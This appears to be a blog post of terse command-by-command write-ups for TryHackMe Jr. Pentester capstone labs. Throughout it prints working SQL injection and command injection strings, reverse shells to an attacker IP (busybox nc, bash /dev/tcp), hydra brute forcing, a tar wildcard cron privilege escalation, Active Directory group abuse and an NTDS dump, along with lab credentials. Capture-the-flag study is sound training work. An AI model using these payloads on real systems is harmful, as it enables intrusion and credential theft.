Post

TryHackme Jr.Pentester Capstone Challenges

Posted Updated
Preview Image
By
7 min read
TryHackme Jr.Pentester Capstone Challenges

Tryhackme Jr.Pentester Challenges

Operation Promotion

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

export IP=Target_IP
[Scanning]
fscan -h $IP -p 1-65535 ALL  ==> 22,80,139,445 Ports Open here
nxc smb $IP
nxc smb $IP --generate-hosts /etc/hosts 
nxc smb $IP --shares   # We have Access to public share, but nothing intersting here.

[Web Exploitation]
whatweb $URL -a 3
katana -u $URL -known-files all -jsluice -js-crawl -o Crawler-katana.txt
dirsearch -r -t 50  --deep-recursive --max-recursion-depth=3 -x 400,404  -u $URL
feroxbuster --url $URL -x php,txt,html,js,json,bak,config,sh,pl,cgi  -t 50 -e

## Internal Login Portal
#### SQL Injections
admin' OR 1=1--
admin'--
admin' --

#### IDOR in user id Paramemter /admin/users/lookup.php?id=FUZZ
#### FUZZ using ffuf, found id=7 [Description:-] /admin/sysmaint-checks/ping.php

[Initial Access]
#### Parameter identification, it return ?host=<Target_IP>
curl -s http://$IP/admin/sysmaint-checks/ping.php?host=192.168.195.14 # It actually ping the box.

#### Command Injection
curl -s http://$IP/admin/sysmaint-checks/ping.php?host=192.168.195.14;id
curl -s http://$IP/admin/sysmaint-checks/ping.php?host=192.168.195.14;which busybox nc

##### Reverse shell
curl -s http://$IP/admin/sysmaint-checks/ping.php?host=192.168.195.14;/usr/bin/busybox nc 192.168.x.x 9001 -e sh


[Post Exploitation]
##### Config file
cat /var/www/html/config/db.conf
==> jford and There hash

##### Cracking Hash
It's seems that hash is not craclable.

##### User Enumeration
cat /etc/passwd | grep -i 'sh$'
==> root,jford,ubuntu

##### Creating Wordlists for Brute force
echo "spring2025" base2025.txt
hashcat --stdout base2025.txt -r /usr/share/hashcat/rules/dive.rule > wordlist2025.txt
echo "spring2026" base2026.txt
hashcat --stdout base2026.txt -r /usr/share/hashcat/rules/dive.rule > wordlist2026.txt


##### Brute force Password
hydra -l jford -P wordlist2026.txt $IP ssh    <=== Found Password [xxxxxxxxx]
hydra -l jford -P wordlist2025.txt $IP ssh 

[SSH Login]
nxc ssh $IP -u 'jford' -p 'xxxxxxxxx'

[Root Exploitation]
sudo -l
=>  (root) NOPASSWD: /usr/bin/find

[GTFOBins Cheatsheet]
sudo find . -exec /bin/sh -p \; -quit

Operation Coldstart

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

export IP=Target_IP
[Scanning]
fscan -h $IP -p 1-65535 ALL  ==> 21,22,80 Open here

[Web Exploitation]
whatweb $URL -a 3
katana -u $URL -known-files all -jsluice -js-crawl -o Crawler-katana.txt
dirsearch -r -t 50  --deep-recursive --max-recursion-depth=3 -x 400,404  -u $URL
feroxbuster --url $URL -x php,txt,html,js,json,bak,config,sh,pl,cgi  -t 50 -e

[FTP Enum]
nxc ftp $IP -u 'Anonymous' -p 'Anonymous'
nxc ftp $IP -u 'Anonymous' -p 'Anonymous' --ls
nxc ftp $IP -u 'Anonymous' -p 'Anonymous' --get backup.tar.gz

[Source Code Review]
tar xvf backup.tar.gz
##### Manually Found !
Host:- kestrel.thm
Path:- /admin  or /admin/notes

##### Automation Found !
opengrep scan --config auto .    # scan backup-source-code
Attack:- SSRF

[Initial Exploitaion]
##### SSRF
http://kestrel.thm         # It actually Return the Whole Page
http://kestrel.thm/admin   # Return [volt lab admin endpoint]
http://kestrel.thm/admin/notes # It return the creds
user:- webdev
pass:- xxxxxxxx

[SSH Login]
nxc ssh $IP -u 'webdev' -p 'xxxxxxx'
ssh webdev@$IP ---> Successfully Login it!

[Post Exploitation]
# DETECTION
cat /etc/cron.d/Cron_Name_Here
# * * * * * root cd /opt/backups && tar czf /var/backups/uploads.tgz *
#                                                                    ^
#                                                runs as root + wildcard in writable directory

# EXPLOITATION
cd /opt/backups
# payload: creates SUID bash
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > shell.sh         
touch -- '--checkpoint=1'                        # creates a file named --checkpoint=1
touch -- '--checkpoint-action=exec=sh shell.sh'  # creates a file named --checkpoint-action=exec=sh shell.sh

# Wait for cron to run, then:
/tmp/bash -p        # -p preserves root effective UID

# BEHIND THE SCENES
# Shell expands * into all filenames before tar runs, so tar sees:
tar czf /var/backups/uploads.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh
#                                 ↑ these are actually filenames, but tar treats them as real flags
#                                   --checkpoint-action tells tar to execute shell.sh as root

Dead Drop

Web Server Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

export IP=Target_IP
#### Scanning
fscan -h $IP -p 1-65535 ALL  ==> 22,80 Open here

#### Web login Portal
==> [SQL Injection Bypass]
admin'--
admin' AND 1=1--
==> [SQL Injection Database Extraction]
back-end DBMS: SQLite
Tables:- sqlite_sequence,users
sqlmap -r req.txt --batch --risk=3 --level=5 --dbs -T users --dump
{Extracted Database Credentials}:-
svc-backup:xxxxxx
admin:xxxxxxx

==> [Reverse shell]
{pwn.js}:-
require('child_process').exec(
'bash -c "bash -i >& /dev/tcp/192.168.x.x/9001 0>&1"'
)

==> [Credential Hunting on Web server and Cracking Hash]
{shadow.bak} file found! NTLMV2-Hash
john shadow.bak /usr/share/wordlists/rockyou.txt
svc-drop:xxxxxxxxxxxx

==> [SSH Login]
svc-drop:xxxxxxxxxxxx

==> [APK Compilation]
/home/svc-drop/backup/deaddrop-mobile.apk  --> Compile it using {jadx-gui  Application}

{Global search} :- Control + shift + F ==> Type (username,password)
Found Creds j.harris:xxxxxxxxxxxxx2026!

Pivoting using ligolo-ng

updating..

DC and WRK

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

[Intial Access]
Create Creds file and Spray Username and Passwords over DC and WRK.
nxc smb $DC -u 'users' -p 'passwd'  --continue-on-success
==> j.harris:xxxxxxxxxx

[Post Exploitation]
##### Bloodhound
nxc ldap $DC -u 'j.harris' -p 'xxxxxx' --bloodhound --collection All --dns-server $DC
bloodhound-python -d deaddrop.loc -u 'j.harris' -p 'xxxxxxx' -ns $DC -dc DEADDROP-DC.deaddrop.loc -c All --zip
bloodyAD --host $DC -d deaddrop.loc -u 'j.harris' -p 'xxxxxx'  get bloodhound --transitive --path .
rusthound --domain deaddrop.loc -u 'j.harris' -p 'xxxxxxxx'  --zip

##### lilzey
connect j.harris $PASS deaddrop.loc 192.168.11.100
==> kerberoasting
==> checkacl   {Found}:- AddMembers Permissions over Admin Groups.

##### AddMembers to ITSupport-Admin Group
bloodyAD --host DEADDROP-DC.deaddrop.loc -d deaddrop.loc -u j.harris -p xxxxxxxx add groupMember "ITSupport-Admins" j.harris


[Dumping]
nxc smb $DC -u 'j.harris' -p 'xxxxx' --ntds
nxc smb $DC -u 'j.harris' -p 'xxxxx' -x 'type C:\users\administrator\desktop\flag.txt'

[Bonus]
┌──(root㉿kali)-[/capstone/loot]
└─# nxc smb $DC -u 'j.harris' -p 'xxxxxxxxxx' -x 'type C:\users\administrator\desktop\flag.txt'
SMB         192.168.11.100  445    DEADDROP-DC      [*] Windows 10 / Server 2019 Build 17763 x64 (name:DEADDROP-DC) (domain:deaddrop.loc) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.11.100  445    DEADDROP-DC      [+] deaddrop.loc\j.harris:xxxxxxx (Pwn3d!)
SMB         192.168.11.100  445    DEADDROP-DC      [+] Executed command via wmiexec
SMB         192.168.11.100  445    DEADDROP-DC      THM{d34d_dr0p_d0m41n_pwn3d}

[Creds File]
svc-backup:BackupAgent2024
admin:SuperSecretAdm1n!
svc-drop:dropsofjupiter
j.harris:DropsOfJupiter2026!

Interceptor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

export IP=Target_IP
#### Scanning
fscan -h $IP -p 1-65535 ALL  ==> 22,80 Open here

#### Web server Exploitation
[SQL Injection] ==> Failed
[Brute Force Credentials] ==> Failed

[Directory Fuzzing]
##### Fuzzing Extensions Save my Day!
dirsearch -r -t 50  --deep-recursive --max-recursion-depth=3 -x 400,404  -u $URL -e bak,php,php.bak,config,php.config
feroxbuster --url $URL -x php,txt,html,js,json,bak,php.bak,config,sh,pl,cgi  -t 50 -e 
==> login.php.bak

[Password File Generate]
Hint :- MediaHub + Any Year
Mediahub2020
Mediahub2021
Mediahub2022
Mediahub2023
Mediahub2024
Mediahub2025
Mediahub2026 

[Credential Brute Force]
hydra -l admin@mediahub -P Custom-password.txt -s 80  -f $TARGET  http-get  ==>MediaHub2026 Worked!

[OPT Bypass]
It Just Checked, if the OPT is varified or Not!
Bypass ==> It using by Replace the Object and Put (is_verified=True)

[Post Exploitation Over Website]
##### File Upload bypass ==> Failed
Tried many file bypass, with gif and so more. It didn't work..

##### SSRF bypass ==> Pass
Coming on this i Read Writeup About that, SSRF + Command Injection Into It.
[Filters Bypass]
http://127.0.0.1/ <-- If you Run this, probally Blocked.
### Failed
http://127.0.0.1;id
http://127.0.0.1|id
http://127.0.0.1&id
http://127.0.0.1\nid  or http://127.0.0.1%0aid
### Worked
http://127.0.0.1`id`
http://127.0.0.1$(id)

[Command Injection Worked]
http://127.0.0.1$(which busybox)
http://127.0.0.1$(busybox nc 192.168.x.x 9001 -e bash)

[Post Exploit]
##### Database Extraction and Credentials
mysql Running:-
[mysql:3360]

Config File:-
[config.js]

##### Root Unintened   <- Read from 0xb0b website!
## 2026 Copy Fail Exploit
root@interceptor:~# cd /root;ls
snap
root@interceptor:~# echo "0xmr was here...? Can you See Me my Website 0xmrsecurity.github.io" > tryhackme-Note.txt
root@interceptor:~# cat tryhackme-Note.txt 
0xmr was here...? Can you See Me my Website 0xmrsecurity.github.io

I am keep updating all Challenge Writeups…

Series
Series
This post is licensed under CC BY 4.0 by the author.